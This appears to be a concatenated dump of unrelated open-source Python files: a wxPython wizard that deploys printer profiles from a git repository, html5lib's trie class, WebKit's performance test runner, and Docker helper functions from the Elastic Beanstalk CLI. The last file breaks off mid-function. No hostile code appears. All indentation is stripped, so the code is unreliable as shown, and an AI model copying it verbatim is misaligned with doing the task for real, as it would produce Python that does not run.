title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sel_box = wx.StaticText(self, -1, '\n\n')
self.sizer.Add(self.sel_box, 0, wx.ALL, 5)
self.status = wx.StaticText(self, -1, "Processing...")
self.sizer.Add(self.status, 0, wx.ALL, 5)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def afterRun(self):
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
#----------------------------------------------------------------------
def Run(self):
self.status.SetLabel("Processing...")
global x2ProfilerApp
self.selection = x2ProfilerApp.selection
if self.selection != None:
if not x2ProfilerApp.tmp_repo_path == None:
paths_str = "\nFrom repository: " + x2ProfilerApp.repo_url + "\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
else:
paths_str = "\nFrom repository: " + x2ProfilerApp.x2swProfilesPath + ".git\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
self.sel_box.SetLabel('Profile: ' + self.selection[10:] + paths_str)
else:
paths_str = "\nRepository path: none\nDeployment path: none"
self.sel_box.SetLabel('Profile: ' + 'not selected' + paths_str)
self.Show()
self.GetParent().Update()
if not x2ProfilerApp.page5.deploy_profile.IsChecked():
self.status.SetLabel("No changes performed, no profile selected!")
else:
try:
self.DoDeploy(self.selection)
self.status.SetLabel("The operation has completed successfully.")
except Exception as e:
self.status.SetLabel("\
The operation has failed! If using Windows in-place profile storage, try running\n\
the X2SW app in Windows XP (SP2) compatibility mode or run it as Administrator.\n\
You can also cd to the X2SW profiles folder and use GIT to check out the desired\n\
profile manually, or attempt to diagnose and fix the issue.")
wx.MessageBox("Error:\n\n" + str(e), '', style = wx.OK|wx.ICON_EXCLAMATION)
x2ProfilerApp.changes = True
self.Show()
self.GetParent().Update()
wx.CallAfter(self.afterRun)
#----------------------------------------------------------------------
def DoDeploy(self, ref):
global x2ProfilerApp
self.repo = x2ProfilerApp.repo
self.refs = self.repo.get_refs()
o = self.repo[ref]
while o.type_name == 'tag':
type_name, sha = o._get_object()
o = self.repo.get_object(sha)
if not o.type_name == 'commit':
raise ValueError('Unable to find the tagged commit!')
# We can only do a clean checkout, so clean up first
self.RmAllProfiles(x2ProfilerApp.x2swProfilesPath)
# Dulwich can't handle detached head, so use a temp branch as a workaround
self.repo.refs.set_symbolic_ref('HEAD', 'refs/heads/temp')
self.repo['HEAD'] = o.id
build_index_from_tree(self.repo.path, self.repo.index_path(),
self.repo.object_store, o.tree)
# Make the deployment folder (if not there) and checkout files into it
if not os.path.isdir(x2ProfilerApp.x2swProfilesTgtPath):
os.makedirs(x2ProfilerApp.x2swProfilesTgtPath)
else:
# Cleanup the deployment destination
self.RmAllProfiles(x2ProfilerApp.x2swProfilesTgtPath)
build_index_from_tree(x2ProfilerApp.x2swProfilesTgtPath, self.repo.index_path(),
self.repo.object_store, o.tree)
#----------------------------------------------------------------------
def RmAllProfiles(self, path):
if not path.endswith('.x2sw'):
raise ValueError('The path to RmAllProfiles() does not appear to be correct!')
for root, dirs, files in os.walk(path):
if root == path:
if '.git' in dirs:
dirs.remove('.git')
if '.git' in files:
files.remove('.git')
if '.use_local' in files:
files.remove('.use_local')
for name in files:
os.remove(os.path.join(root, name))
for name in list(dirs):  # iterate over a copy: removing from dirs mid-iteration skips entries
shutil.rmtree(os.path.join(root, name))
dirs.remove(name)  # keep os.walk from descending into the deleted directory
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class X2ProfilerApp():
"""Main app class"""
#----------------------------------------------------------------------
def imagefile(self, filename):
if os.path.exists(os.path.join(os.path.dirname(__file__), "images", filename)):
return os.path.join(os.path.dirname(__file__), "images", filename)
else:
return os.path.join(os.path.split(os.path.split(__file__)[0])[0], "images", filename)
#----------------------------------------------------------------------
def DetermineProfilesPaths(self):
self.x2swProfilesTgtPath = os.path.join(os.path.expanduser('~'), '.x2sw')
if (os.path.exists(os.path.join(self.x2swProfilesTgtPath, '.use_local'))):
self.x2swProfilesTgtPath = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), '.x2sw')
self.x2swProfilesPath = os.path.abspath(os.path.dirname(sys.argv[0]))
self.x2swProfilesPath = os.path.join(self.x2swProfilesPath, '.x2sw')
#----------------------------------------------------------------------
def ReadOurVersion(self):
versionfile = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), VERSION_FILE)
if os.path.exists(versionfile):
with open(versionfile) as f:
self.ver = f.read().splitlines()
else:
self.ver = [ None ]
# Match string (major.minor.) use: vrsion_str_tocheck.startswith(ver_match_str)
self.ver_match_str = ""
if self.ver[0]:
ver = self.ver[0]
ver = ver[:ver.find('.', ver.find('.') + 1) + 1]
self.ver_match_str = ver
else:
self.ver = [ "" ]
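# Illustrative: if the first line of version.txt is '2.1.3.7', the slicing
# above keeps everything up to and including the second dot, so
# ver_match_str becomes '2.1.' and profile refs starting with 'v2.1.' match.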
#----------------------------------------------------------------------
def IsProfileCompatible(self):
compat_file = os.path.join(self.x2swProfilesPath, COMPAT_FILE)
we_are_compatible = False
match_strs = []
if os.path.exists(compat_file):
with open(compat_file) as f:
match_strs = f.read().splitlines()
for match_str in match_strs:
if self.ver[0] and self.ver[0].startswith(match_str):
we_are_compatible = True
break
return we_are_compatible
#----------------------------------------------------------------------
def UpdateCompatFile(self):
compat_file = os.path.join(self.x2swProfilesPath, COMPAT_FILE)
we_are_compatible = False
match_strs = []
if os.path.exists(compat_file):
with open(compat_file) as f:
match_strs = f.read().splitlines()
match_strs.append(self.ver_match_str)
if os.path.exists(self.x2swProfilesPath):
with open(compat_file, "w") as myfile:
for line in match_strs:
myfile.write(line + "\n")
return
#----------------------------------------------------------------------
def Run(self, onlyIfVersionCheckFails = False):
global x2ProfilerApp
x2ProfilerApp = self
self.DetermineProfilesPaths()
self.repo = None
self.changes = False
### for debugging ### self.repo_url = 'D:\\tmp\\.x2sw'
self.repo_url = 'https://github.com/dob71/x2sw_profiles.git'
self.selection = None
self.tmp_repo_path = None
# Read our version (x2ProfilerApp.ver array contains strings from version.txt)
self.ReadOurVersion()
# If running for version check only, we are done if a compatible profile is present
if onlyIfVersionCheckFails:
if self.IsProfileCompatible():
return
else:
msg = "The current profile is not compatible with X2SW v" + self.ver[0] + ". "\
"Would you like to run X2Profiler and download compatible set of profiles? "\
"\n\n"\
"Click [Cancel] to mark the currnet profile compatible and no loger display this message "\
"(dangerous, the app might no longer start). Click [No] to skip the update just for now. "\
"You'll be asked to update again next time app starts."\
"\n\n"\
"Profile path: " + self.x2swProfilesPath
res = wx.MessageBox(msg, style = wx.YES_NO|wx.CANCEL|wx.YES_DEFAULT|wx.ICON_QUESTION)
if res == wx.CANCEL:
self.UpdateCompatFile()
return
elif res == wx.NO:
return
image = wx.Image(self.imagefile("wiz.png"), wx.BITMAP_TYPE_PNG).ConvertToBitmap()
self.wizard = wiz.Wizard(None, -1, "X2 Profile Manager", image)
self.page1 = UpdateRepoPage(self.wizard, "Update Profiles")
self.page2 = DownloadingPage(self.wizard, "Downloading")
self.page3 = SelectProfilesPage(self.wizard, "Select Profile")
self.page4 = ChooseModePage(self.wizard, "Storage Mode")
self.page5 = DeployPage(self.wizard, "Deploy Profile")
self.page6 = ReportResultPage(self.wizard, "Deploying")
# Set the initial order of the pages
self.page1.SetNext(self.page2)
self.page2.SetPrev(self.page1)
self.page2.SetNext(self.page3)
self.page3.SetPrev(self.page1) # Always skip downloading page on the way back
self.page3.SetNext(self.page4)
self.page4.SetPrev(self.page3)
self.page4.SetNext(self.page5)
self.page5.SetPrev(self.page4)
self.page5.SetNext(self.page6)
self.page6.SetPrev(self.page5)
iconpath = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'x2.ico')
if os.path.exists(iconpath):
self.wizard.SetIcon(wx.Icon(iconpath,wx.BITMAP_TYPE_ICO))
self.wizard.Bind(wiz.EVT_WIZARD_PAGE_CHANGING, self.OnPageChanging)
self.wizard.Bind(wx.wizard.EVT_WIZARD_PAGE_CHANGED, self.OnPageChanged)
self.wizard.FitToPage(self.page1)
self.wizard.GetPageAreaSizer().Add(self.page1)
self.wizard.RunWizard(self.page1)
self.wizard.Destroy()
if not x2ProfilerApp.tmp_repo_path == None:
try:
shutil.rmtree(x2ProfilerApp.tmp_repo_path)
x2ProfilerApp.tmp_repo_path = None
except:
pass
return self.changes
#----------------------------------------------------------------------
def OnPageChanged(self, event):
cp = self.wizard.GetCurrentPage()
if hasattr(cp, 'Run'):
wx.CallAfter(cp.Run)
#----------------------------------------------------------------------
def OnPageChanging(self, event):
pg = event.GetPage()
if hasattr(pg, 'OnPageChanging'):
pg.OnPageChanging(event)
########################################################################
if __name__ == "__main__":
app = wx.App(False)
X2ProfilerApp().Run()
| gpl-3.0 |
WholeGrainGoats/servo | tests/wpt/web-platform-tests/tools/html5lib/html5lib/trie/py.py | 817 | 1763 | from __future__ import absolute_import, division, unicode_literals
from six import text_type
from bisect import bisect_left
from ._base import Trie as ABCTrie
class Trie(ABCTrie):
def __init__(self, data):
if not all(isinstance(x, text_type) for x in data.keys()):
raise TypeError("All keys must be strings")
self._data = data
self._keys = sorted(data.keys())
self._cachestr = ""
self._cachepoints = (0, len(data))
def __contains__(self, key):
return key in self._data
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
def __getitem__(self, key):
return self._data[key]
def keys(self, prefix=None):
if prefix is None or prefix == "" or not self._keys:
return set(self._keys)
if prefix.startswith(self._cachestr):
lo, hi = self._cachepoints
start = i = bisect_left(self._keys, prefix, lo, hi)
else:
start = i = bisect_left(self._keys, prefix)
keys = set()
if start == len(self._keys):
return keys
while self._keys[i].startswith(prefix):
keys.add(self._keys[i])
i += 1
self._cachestr = prefix
self._cachepoints = (start, i)
return keys
def has_keys_with_prefix(self, prefix):
if prefix in self._data:
return True
if prefix.startswith(self._cachestr):
lo, hi = self._cachepoints
i = bisect_left(self._keys, prefix, lo, hi)
else:
i = bisect_left(self._keys, prefix)
if i == len(self._keys):
return False
return self._keys[i].startswith(prefix)
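# A minimal usage sketch (illustrative; the data dict is an assumption):
#
#     t = Trie({"abc": 1, "abd": 2, "xyz": 3})
#     t.keys("ab")                  # -> set(["abc", "abd"])
#     t.has_keys_with_prefix("xy")  # -> True
#     t["abc"]                      # -> 1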
| mpl-2.0 |
fentas/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/performance_tests/perftestsrunner.py | 115 | 17309 | # Copyright (C) 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Run Inspector's perf tests in perf mode."""
import os
import json
import logging
import optparse
import time
import datetime
from webkitpy.common import find_files
from webkitpy.common.checkout.scm.detection import SCMDetector
from webkitpy.common.config.urls import view_source_url
from webkitpy.common.host import Host
from webkitpy.common.net.file_uploader import FileUploader
from webkitpy.performance_tests.perftest import PerfTestFactory
from webkitpy.performance_tests.perftest import DEFAULT_TEST_RUNNER_COUNT
_log = logging.getLogger(__name__)
class PerfTestsRunner(object):
_default_branch = 'webkit-trunk'
EXIT_CODE_BAD_BUILD = -1
EXIT_CODE_BAD_SOURCE_JSON = -2
EXIT_CODE_BAD_MERGE = -3
EXIT_CODE_FAILED_UPLOADING = -4
EXIT_CODE_BAD_PREPARATION = -5
_DEFAULT_JSON_FILENAME = 'PerformanceTestsResults.json'
def __init__(self, args=None, port=None):
self._options, self._args = PerfTestsRunner._parse_args(args)
if port:
self._port = port
self._host = self._port.host
else:
self._host = Host()
self._port = self._host.port_factory.get(self._options.platform, self._options)
self._host.initialize_scm()
self._webkit_base_dir_len = len(self._port.webkit_base())
self._base_path = self._port.perf_tests_dir()
self._timestamp = time.time()
self._utc_timestamp = datetime.datetime.utcnow()
@staticmethod
def _parse_args(args=None):
def _expand_path(option, opt_str, value, parser):
path = os.path.expandvars(os.path.expanduser(value))
setattr(parser.values, option.dest, path)
perf_option_list = [
optparse.make_option('--debug', action='store_const', const='Debug', dest="configuration",
help='Set the configuration to Debug'),
optparse.make_option('--release', action='store_const', const='Release', dest="configuration",
help='Set the configuration to Release'),
optparse.make_option("--platform",
help="Specify port/platform being tested (i.e. chromium-mac)"),
optparse.make_option("--builder-name",
help=("The name of the builder shown on the waterfall running this script e.g. google-mac-2.")),
optparse.make_option("--build-number",
help=("The build number of the builder running this script.")),
optparse.make_option("--build", dest="build", action="store_true", default=True,
help="Check to ensure the DumpRenderTree build is up-to-date (default)."),
optparse.make_option("--no-build", dest="build", action="store_false",
help="Don't check to see if the DumpRenderTree build is up-to-date."),
optparse.make_option("--build-directory",
help="Path to the directory under which build files are kept (should not include configuration)"),
optparse.make_option("--time-out-ms", default=600 * 1000,
help="Set the timeout for each test"),
optparse.make_option("--no-results", action="store_false", dest="generate_results", default=True,
help="Do no generate results JSON and results page."),
optparse.make_option("--output-json-path", action='callback', callback=_expand_path, type="str",
help="Path to generate a JSON file at; may contain previous results if it already exists."),
optparse.make_option("--reset-results", action="store_true",
help="Clears the content in the generated JSON file before adding the results."),
optparse.make_option("--slave-config-json-path", action='callback', callback=_expand_path, type="str",
help="Only used on bots. Path to a slave configuration file."),
optparse.make_option("--description",
help="Add a description to the output JSON file if one is generated"),
optparse.make_option("--no-show-results", action="store_false", default=True, dest="show_results",
help="Don't launch a browser with results after the tests are done"),
optparse.make_option("--test-results-server",
help="Upload the generated JSON file to the specified server when --output-json-path is present."),
optparse.make_option("--webkit-test-runner", "-2", action="store_true",
help="Use WebKitTestRunner rather than DumpRenderTree."),
optparse.make_option("--replay", dest="replay", action="store_true", default=False,
help="Run replay tests."),
optparse.make_option("--force", dest="use_skipped_list", action="store_false", default=True,
help="Run all tests, including the ones in the Skipped list."),
optparse.make_option("--profile", action="store_true",
help="Output per-test profile information."),
optparse.make_option("--profiler", action="store",
help="Output per-test profile information, using the specified profiler."),
optparse.make_option("--additional-drt-flag", action="append",
default=[], help="Additional command line flag to pass to DumpRenderTree "
"Specify multiple times to add multiple flags."),
optparse.make_option("--driver-name", type="string",
help="Alternative DumpRenderTree binary to use"),
optparse.make_option("--repeat", default=1, type="int",
help="Specify number of times to run test set (default: 1)."),
optparse.make_option("--test-runner-count", default=DEFAULT_TEST_RUNNER_COUNT, type="int",
help="Specify number of times to invoke test runner for each performance test."),
]
return optparse.OptionParser(option_list=(perf_option_list)).parse_args(args)
def _collect_tests(self):
test_extensions = ['.html', '.svg']
if self._options.replay:
test_extensions.append('.replay')
def _is_test_file(filesystem, dirname, filename):
return filesystem.splitext(filename)[1] in test_extensions
filesystem = self._host.filesystem
paths = []
for arg in self._args:
if filesystem.exists(filesystem.join(self._base_path, arg)):
paths.append(arg)
else:
relpath = filesystem.relpath(arg, self._base_path)
if filesystem.exists(filesystem.join(self._base_path, relpath)):
paths.append(filesystem.normpath(relpath))
else:
_log.warn('Path was not found: ' + arg)
skipped_directories = set(['.svn', 'resources'])
test_files = find_files.find(filesystem, self._base_path, paths, skipped_directories, _is_test_file)
tests = []
for path in test_files:
relative_path = filesystem.relpath(path, self._base_path).replace('\\', '/')
if self._options.use_skipped_list and self._port.skips_perf_test(relative_path) and filesystem.normpath(relative_path) not in paths:
continue
test = PerfTestFactory.create_perf_test(self._port, relative_path, path, test_runner_count=self._options.test_runner_count)
tests.append(test)
return tests
def run(self):
if not self._port.check_build(needs_http=False):
_log.error("Build not up to date for %s" % self._port._path_to_driver())
return self.EXIT_CODE_BAD_BUILD
run_count = 0
repeat = self._options.repeat
while (run_count < repeat):
run_count += 1
tests = self._collect_tests()
runs = ' (Run %d of %d)' % (run_count, repeat) if repeat > 1 else ''
_log.info("Running %d tests%s" % (len(tests), runs))
for test in tests:
if not test.prepare(self._options.time_out_ms):
return self.EXIT_CODE_BAD_PREPARATION
unexpected = self._run_tests_set(sorted(list(tests), key=lambda test: test.test_name()))
if self._options.generate_results and not self._options.profile:
exit_code = self._generate_results()
if exit_code:
return exit_code
if self._options.generate_results and not self._options.profile:
test_results_server = self._options.test_results_server
if test_results_server and not self._upload_json(test_results_server, self._output_json_path()):
return self.EXIT_CODE_FAILED_UPLOADING
if self._options.show_results:
self._port.show_results_html_file(self._results_page_path())
return unexpected
def _output_json_path(self):
output_json_path = self._options.output_json_path
if output_json_path:
return output_json_path
return self._host.filesystem.join(self._port.perf_results_directory(), self._DEFAULT_JSON_FILENAME)
def _results_page_path(self):
return self._host.filesystem.splitext(self._output_json_path())[0] + '.html'
def _generate_results(self):
options = self._options
output_json_path = self._output_json_path()
output = self._generate_results_dict(self._timestamp, options.description, options.platform, options.builder_name, options.build_number)
if options.slave_config_json_path:
output = self._merge_slave_config_json(options.slave_config_json_path, output)
if not output:
return self.EXIT_CODE_BAD_SOURCE_JSON
output = self._merge_outputs_if_needed(output_json_path, output)
if not output:
return self.EXIT_CODE_BAD_MERGE
filesystem = self._host.filesystem
json_output = json.dumps(output)
filesystem.write_text_file(output_json_path, json_output)
template_path = filesystem.join(self._port.perf_tests_dir(), 'resources/results-template.html')
template = filesystem.read_text_file(template_path)
absolute_path_to_trunk = filesystem.dirname(self._port.perf_tests_dir())
results_page = template.replace('%AbsolutePathToWebKitTrunk%', absolute_path_to_trunk)
results_page = results_page.replace('%PeformanceTestsResultsJSON%', json_output)
filesystem.write_text_file(self._results_page_path(), results_page)
def _generate_results_dict(self, timestamp, description, platform, builder_name, build_number):
revisions = {}
for (name, path) in self._port.repository_paths():
scm = SCMDetector(self._host.filesystem, self._host.executive).detect_scm_system(path) or self._host.scm()
revision = scm.svn_revision(path)
revisions[name] = {'revision': revision, 'timestamp': scm.timestamp_of_revision(path, revision)}
meta_info = {
'description': description,
'buildTime': self._datetime_in_ES5_compatible_iso_format(self._utc_timestamp),
'platform': platform,
'revisions': revisions,
'builderName': builder_name,
'buildNumber': int(build_number) if build_number else None}
contents = {'tests': {}}
for key, value in meta_info.items():
if value:
contents[key] = value
for test, metrics in self._results:
for metric_name, iteration_values in metrics.iteritems():
if not isinstance(iteration_values, list): # We can't report results without individual measurements.
continue
tests = contents['tests']
path = test.test_name_without_file_extension().split('/')
for i in range(0, len(path)):
is_last_token = i + 1 == len(path)
url = view_source_url('PerformanceTests/' + (test.test_name() if is_last_token else '/'.join(path[0:i + 1])))
tests.setdefault(path[i], {'url': url})
current_test = tests[path[i]]
if is_last_token:
current_test.setdefault('metrics', {})
assert metric_name not in current_test['metrics']
current_test['metrics'][metric_name] = {'current': iteration_values}
else:
current_test.setdefault('tests', {})
tests = current_test['tests']
return contents
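# Illustrative sketch (not part of the original file): the dict built above
# nests one entry per path component of the test name. For a hypothetical
# test 'Bindings/event-target-wrapper.html' with a 'Time' metric, the result
# resembles the literal below (URLs and values are made up):
def _example_results_dict_shape():
    return {
        'buildTime': '2013-02-08T09:30:26.000000',
        'tests': {
            'Bindings': {
                'url': 'https://example.org/PerformanceTests/Bindings',
                'tests': {
                    'event-target-wrapper': {
                        'url': 'https://example.org/PerformanceTests/Bindings/event-target-wrapper.html',
                        'metrics': {'Time': {'current': [1448.0, 1443.5, 1457.9]}},
                    },
                },
            },
        },
    }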
@staticmethod
def _datetime_in_ES5_compatible_iso_format(datetime):
return datetime.strftime('%Y-%m-%dT%H:%M:%S.%f')
def _merge_slave_config_json(self, slave_config_json_path, contents):
if not self._host.filesystem.isfile(slave_config_json_path):
_log.error("Missing slave configuration JSON file: %s" % slave_config_json_path)
return None
try:
slave_config_json = self._host.filesystem.open_text_file_for_reading(slave_config_json_path)
slave_config = json.load(slave_config_json)
for key in slave_config:
contents['builder' + key.capitalize()] = slave_config[key]
return contents
except Exception as error:
_log.error("Failed to merge slave configuration JSON file %s: %s" % (slave_config_json_path, error))
return None
def _merge_outputs_if_needed(self, output_json_path, output):
if self._options.reset_results or not self._host.filesystem.isfile(output_json_path):
return [output]
try:
existing_outputs = json.loads(self._host.filesystem.read_text_file(output_json_path))
return existing_outputs + [output]
except Exception as error:
_log.error("Failed to merge output JSON file %s: %s" % (output_json_path, error))
return None
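# Minimal sketch of the merge semantics above (illustrative values): a fresh
# or reset run yields a single-element list, while an existing output file
# accumulates one results dict per run, newest last.
def _example_merge_semantics():
    existing_outputs = [{'buildNumber': 1}, {'buildNumber': 2}]  # parsed file
    output = {'buildNumber': 3}                                  # this run
    return existing_outputs + [output]  # -> three entries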
def _upload_json(self, test_results_server, json_path, host_path="/api/report", file_uploader=FileUploader):
url = "https://%s%s" % (test_results_server, host_path)
uploader = file_uploader(url, 120)
try:
response = uploader.upload_single_text_file(self._host.filesystem, 'application/json', json_path)
except Exception as error:
_log.error("Failed to upload JSON file to %s in 120s: %s" % (url, error))
return False
response_body = [line.strip('\n') for line in response]
if response_body != ['OK']:
try:
parsed_response = json.loads('\n'.join(response_body))
except ValueError: # json.loads raises ValueError on malformed JSON
_log.error("Uploaded JSON to %s but got a bad response:" % url)
for line in response_body:
_log.error(line)
return False
if parsed_response.get('status') != 'OK':
_log.error("Uploaded JSON to %s but got an error:" % url)
_log.error(json.dumps(parsed_response, indent=4))
return False
_log.info("JSON file uploaded to %s." % url)
return True
def _run_tests_set(self, tests):
result_count = len(tests)
failures = 0
self._results = []
for i, test in enumerate(tests):
_log.info('Running %s (%d of %d)' % (test.test_name(), i + 1, len(tests)))
start_time = time.time()
metrics = test.run(self._options.time_out_ms)
if metrics:
self._results.append((test, metrics))
else:
failures += 1
_log.error('FAILED')
_log.info('Finished: %f s' % (time.time() - start_time))
_log.info('')
return failures
| bsd-3-clause |
quickresolve/accel.ai | flask-aws/lib/python2.7/site-packages/ebcli/containers/commands.py | 5 | 8658 | # Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import os
import json
import sys
from botocore.compat import six
from cement.utils.misc import minimal_logger
from ..core import fileoperations
from ..lib import utils
from ..objects.exceptions import ValidationError, CommandError
from ..resources.strings import strings
EXPOSE_CMD = 'EXPOSE'
FROM_CMD = 'FROM'
LATEST_TAG = ':latest'
NETWORK_SETTINGS_KEY = 'NetworkSettings'
PORTS_KEY = 'Ports'
HOST_PORT_KEY = 'HostPort'
STATE_KEY = 'State'
RUNNING_KEY = 'Running'
LOG = minimal_logger(__name__)
def pull_img(full_docker_path):
"""
Pulls a base image found in Dockerfile.
:param full_docker_path: str: path to the Dockerfile
:return: None
"""
img = _get_base_img(full_docker_path)
if not _is_tag_specified(img):
img += LATEST_TAG
_pull_img(img)
def build_img(docker_path, file_path=None):
"""
Builds a docker image using Dockerfile found in docker path.
:param docker_path: str: path of dir containing the Dockerfile
:param file_path: str: optional name of Dockerfile
:return: str: id of the new image
"""
opts = ['-f', file_path] if file_path else []
args = ['docker', 'build'] + opts + [docker_path]
output = _run_live(args)
return _grab_built_image_id(output)
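# Hypothetical usage sketch (not part of the original module); assumes a
# running Docker daemon and a Dockerfile in the current directory. The image
# id parsed from the build output is handed straight to run_container(),
# which maps the Dockerfile's EXPOSEd port to host port 8080.
def _example_build_and_run():
    image_id = build_img('.', file_path='Dockerfile')
    run_container('./Dockerfile', image_id, host_port='8080',
                  envvars_map={'DEBUG': '1'}, name='local-app')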
def run_container(full_docker_path, image_id, host_port=None,
envvars_map=None, volume_map=None, name=None):
"""
Runs a Docker container. Container port comes from the Dockerfile,
which is mapped to the given host port.
:param full_docker_path: str: path to the Dockerfile
:param image_id: str: id of the image being used to run
:param host_port: str: optional host port. Same as container port by default
:param envvars_map: dict: optional key-val map of environment variables
:param volume_map: dict: optional key-val map of host-container volume mounts
:param name: str: optional name to be assigned to the container
:return: None
"""
container_port = _get_container_port(full_docker_path)
if host_port is None:
host_port = container_port
_run_container(image_id, container_port, host_port, envvars_map,
volume_map, name)
def rm_container(container_id, force=False):
"""
Remove a container.
:param container_id: str: the container's id or name
:param force: bool: force the removal of the container (SIGKILL)
:return None
"""
force_arg = ['-f'] if force else []
args = ['docker', 'rm'] + force_arg + [container_id]
_run_quiet(args)
def up(compose_path=None, allow_insecure_ssl=False):
"""
Build and run the entire app using services defined in docker-compose.yml.
:param compose_path: str: optional alternate path to docker-compose.yml
:param allow_insecure_ssl: bool: allow insecure connection to docker registry
:return None
"""
file_opt = ['-f', '{}'.format(compose_path)] if compose_path else []
insecure_ssl_opt = ['--allow-insecure-ssl'] if allow_insecure_ssl else []
args = file_opt + ['up'] + insecure_ssl_opt
LOG.debug(args)
_compose_run(args)
def _compose_run(args):
from ebcli.bundled._compose.cli.main import main as compose_run
compose_run(*args)
def get_container_lowlvl_info(container_id):
"""
Get a running container's low level info.
:param container_id: str: the running container's id or name
:return dict
"""
args = ['docker', 'inspect', container_id]
info = json.loads(_run_quiet(args))
return info[0]
def is_container_existent(container_id):
"""
Return whether container exists.
:param container_id: str: the id or name of the container to check
:return bool
"""
try:
get_container_lowlvl_info(container_id)
return True
except CommandError:
return False
def is_running(container_id):
"""
Return whether container is currently running.
:param container_id: str: the id or name of the container to check
:return bool
"""
try:
info = get_container_lowlvl_info(container_id)
return info[STATE_KEY][RUNNING_KEY]
except CommandError:
return False
def get_exposed_hostports(container_id):
"""
Get the host ports we exposed when we ran this container.
:param container_id: str: the id or name of the running container
:return list
"""
# Since we ran the container, we can guarantee that
# one host port and one or more container ports are exposed.
# Example of port_map:
#
# {'4848/tcp': None,
# '8080/tcp': [{'HostPort': '8080', 'HostIp': '0.0.0.0'}],
# '8181/tcp': None}
try:
port_map = _get_network_settings(container_id)[PORTS_KEY] or {}
return utils.flatten([[p[HOST_PORT_KEY] for p in ports]
for ports in six.itervalues(port_map) if ports])
except CommandError: # Not running
return []
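# Minimal sketch of the flattening above, reusing the sample port_map from
# the comment: only container ports that were actually mapped contribute a
# HostPort entry.
def _example_exposed_hostports():
    port_map = {'4848/tcp': None,
                '8080/tcp': [{'HostPort': '8080', 'HostIp': '0.0.0.0'}],
                '8181/tcp': None}
    return [p[HOST_PORT_KEY] for ports in six.itervalues(port_map) if ports
            for p in ports]  # -> ['8080']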
def version():
args = ['docker', '--version']
version_str = _run_quiet(args)
# Format: Docker version 1.5.0, build a8a31ef
return version_str.split()[2].strip(',')
def compose_version():
args = ['docker-compose', '--version']
# Format: docker-compose 1.1.0
return _run_quiet(args).split()[-1]
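# Quick sketch of the version parsing above, using the sample strings from
# the format comments (actual output varies by release):
def _example_version_parsing():
    docker_out = 'Docker version 1.5.0, build a8a31ef'
    compose_out = 'docker-compose 1.1.0'
    assert docker_out.split()[2].strip(',') == '1.5.0'
    assert compose_out.split()[-1] == '1.1.0'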
def _get_network_settings(container_id):
info = get_container_lowlvl_info(container_id)
return info[NETWORK_SETTINGS_KEY]
def _pull_img(img):
args = ['docker', 'pull', img]
return _run_live(args)
def _grab_built_image_id(build_output):
last_line = build_output.split('\n')[-1]
image_id = last_line.split()[-1]
return image_id
def _run_container(image_id, container_port, host_port, envvars_map,
volume_map, name):
port_mapping = '{}:{}'.format(host_port, container_port)
interactive_opt = ['-i']
pseudotty_opt = ['-t']
rm_container_on_exit_opt = ['--rm']
port_opt = ['-p', port_mapping]
envvar_opt = _get_env_opts(envvars_map)
volume_opt = _get_volume_opts(volume_map)
name_opt = ['--name', name] if name else []
opts = (interactive_opt + pseudotty_opt + rm_container_on_exit_opt +
port_opt + envvar_opt + volume_opt + name_opt)
args = ['docker', 'run'] + opts + [image_id]
return _run_live(args)
def _get_container_port(full_docker_path):
return _fst_match_in_dockerfile(full_docker_path,
lambda s: s.startswith(EXPOSE_CMD),
strings['local.run.noportexposed'])[1]
def _get_base_img(full_docker_path):
return _fst_match_in_dockerfile(full_docker_path,
lambda s: s.startswith(FROM_CMD),
strings['local.run.nobaseimg'])[1]
def _fst_match_in_dockerfile(full_docker_path, predicate, not_found_error_msg):
raw_lines = fileoperations.readlines_from_text_file(full_docker_path)
stripped_lines = (x.strip() for x in raw_lines)
try:
line = next(x for x in stripped_lines if predicate(x))
return line.split()
except StopIteration:
